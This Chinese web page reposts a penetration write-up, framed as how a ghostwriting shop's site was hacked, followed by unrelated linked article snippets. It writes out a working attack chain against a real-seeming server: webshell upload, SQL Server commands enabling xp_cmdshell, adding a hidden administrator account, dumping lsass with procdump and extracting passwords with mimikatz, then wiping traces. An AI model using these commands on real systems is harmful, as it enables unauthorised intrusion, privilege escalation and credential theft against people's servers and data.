近日,一小伙在淘宝找人代写作业后,半个月内接到多个骚扰电话和诈骗电话,觉得自己信息被严重泄漏,找店家质问,店家回复:代写链接遭黑客攻击。

黑客是如何做到的?

一个弱口令进了后台

其实这个站有注入,不过既然进了后台,那肯定要去shell啊,

找了个学生的账号登陆进入发现了头像上传点可以任意文件上传

直接传了个大马,执行命令看下权限

这权限也太小了吧,先来提权,看下补丁

这还不随便打了,传了几个提权exe之后发现都执行不了,可能被杀软杀掉了,然后尝试抓hash

看来只有pwdump7.exe没被杀了,但是权限不够

现在我们的权限能去读一些文件,去翻一翻sqlserver的密码,尝试sqlserver来提权

开启xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

成了,有权限了,尝试加个管理员?

exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test,密码testexec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组

Wtm,加不上啊,杀软拦了,再次使用pwdump7来抓hash

本来就开着3389,直接连上去

Wtm开着管家和金山,传的东西都被拦截了,关掉杀软,先加个隐藏用户

net user test$ pinohd123. /add
net localgroup administrators test$ add

这里lz1y告诉我也可以procdump去搞,procdump是官方的工具,不会被杀软杀

exec master..xp_cmdshell 'xxxx\images\button\Procdump.exe -accepteula -ma lsass.exe -o xxx.dmp'

把2.dmp存到本来来配合mimikatz

mimikatz.exe
sekurlsa::minidump 2.dmp
sekurlsa::logonPasswords full

同样拿到明文。

奈何没有域,擦了脚印溜了。

更多网络安全资讯、漏洞渗透以及海量干货可以关注我的公众号:网络安全情报局

作者:先知社区-p0desta

原文:
https://xz.aliyun.com/t/5646

某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击相关推荐

  1. 找人代做毕设仅被留校察看?卢雷事件结局引热议,西电底下评论IP地址亮了...

    杨净 萧箫 发自 凹非寺 量子位 | 公众号 QbitAI 找人代做毕业设计,结果就只是留校察看? 就在大学生还在对卢雷元年"栓Q"的时候,西电官方这边已经有了最新通报. 这意味着 ...

  2. 懒人日报 | 日本东京将进行区域专用型数字货币的实用试验、蚂蚁区块链涉足冷链物流、eos竞猜游戏FASTWIN遭黑客攻击......

    海外动态 [日本社交媒体巨头Line子公司正式获批加密货币交易许可]  9月6日,日本社交媒体巨头Line旗下加密货币子公司LVC正式通过日本金融厅审批,获得第00017号加密货币交易许可证,将提供B ...

  3. php代码代写,php学生信息代写搜索系统

    文章来源:淘论文网   发布者:毕业设计 浏览量: 本课题主要是基于apache和MySQL数据库应用PHP语言制作一个学生信息搜索系统的Web网页设计,在这个网页上学生.家长可以搜索到学生在校的学习 ...

  4. “翟天临”克星?新开发的反“枪手”AI,识别作业代写准确率接近90%

    编译:曹培信.周家乐 来源:大数据文摘(ID:BigDataDigest) 随着毕业季的邻近,翟天临又一次被网友们骂上了微博热搜. 翟的论文抄袭事件过后,许多高校都加强了论文评审标准,更有严格的院校连 ...

  5. “翟天临”克星?哥本哈根大学开发反“枪手”AI,识别作业代写准确率接近90%...

    大数据文摘出品 编译:曹培信.周家乐 随着毕业季的邻近,翟天临又一次被网友们骂上了微博热搜. 翟的论文抄袭事件过后,许多高校都加强了论文评审标准,更有严格的院校连非毕业生的论文结课都要查重. 许多深夜 ...

  6. “程序员”上淘宝代写春联,这创业接地气啊~

    点击上方"IT平头哥联盟",选择"置顶或者星标" 你的关注意义重大! 来源:经济日报 过年回家的行程已定,淘宝天猫上的春联生意也火了.小寒,天猫年货节上的春联成 ...

  7. 知乎点赞过万留学生自述:我们为什么需要代写???

    在留学圈,一直以来都有一个非常敏感的词--代写,让很多留学生都只能望而却步.国外大学对于学术的严谨程度也是众所周知的,轻则挂科重修,重则开除遣返,导致很多留学生都不敢挺而走险把自己的留学生涯赌上,但是 ...

  8. 易宝支付声明称遭遇大规模黑客攻击

    1月16日消息,易宝支付昨日发布声明表示,从14号下午16:20开始,易宝支付官方网站及支付平台服务器遭遇大规模黑客攻击,截止发稿前,攻击流量已超过10G,目前官网网站依然无法访问. 易宝支付发言人表 ...

  9. 淘宝 代写 python_淘宝代写代码的都是什么人?

    说说我的代写代码经历吧.我就是最近几个月辞职了,还没找到合适的工作前,在朋友的推荐下加入了几个兼职编程群,后来知道都是淘宝商家的.这半年多也完成了很多项目. 刚开始做时,也没想能挣到多少钱,一个项目给 ...

最新文章

  1. SAP MM MM17里不能修改物料主数据'Purchasing Value Key'字段值?
  2. BrainNet:用于人与人之间直接协作的多人脑对脑接口
  3. Android 仿微信小视频录制
  4. Web应用开发中的几个问题
  5. html5里面em是什么单位,HTML5中单位em的理解
  6. Spark入门(Python)
  7. 特斯拉副总裁陶琳:在中国采集的数据都将存在中国
  8. detectron2训练自己的数据集_TensorFlow2学习十五、使用VGG16模型训练自己的数据集...
  9. postgres数据库入门, python 操作postgres
  10. Atitit 提升水平 把代码写的有技术含量 目录 1. 提高可读性(重要) 2 1.1. 异常模式代替返回值 2 1.2. Dsl 2 1.3. 流畅接口方法链 2 1.4. 层次结构抽象 2 1
  11. iOS获取DSYM文件
  12. oracle数据库:恢复delete的数据
  13. c51单片机模块化编程
  14. touch: cannot touch ‘***’: Read-only file system
  15. 程序媛秋招心得及面试经验分享
  16. goldendict词典安装配置
  17. base-64 字符数组的无效长度
  18. HAL库的串口基础学习(包含串口接收不定长数据的实现)
  19. I9 9900K线程_i9 10900K比9900K性能提升了多少?i9-10900K和i9-9900K对比评测
  20. ==和===的区别、NAN

热门文章

  1. Java数据结构入门以及数据结构和算法的关系
  2. JavaScript(二)之DOM 操作
  3. KIVICUBE,WebAR挺好玩的哈
  4. 【SDK 教程】 让 3D 模型 “活起来” 的好方法在这里!
  5. 全国省市区数据库,(简拼,简称,拼音,行政编码,邮政编码)
  6. 微信小程序 设置背景音频
  7. FISCO BCOS 区块链
  8. 不反编译、无逆向基础也能轻松编写Android App Hook插件? Xposed的远房表弟,Hookworm来也!
  9. 什么是接触卡和非接触卡?
  10. C语言经典面试算法题之跳水比赛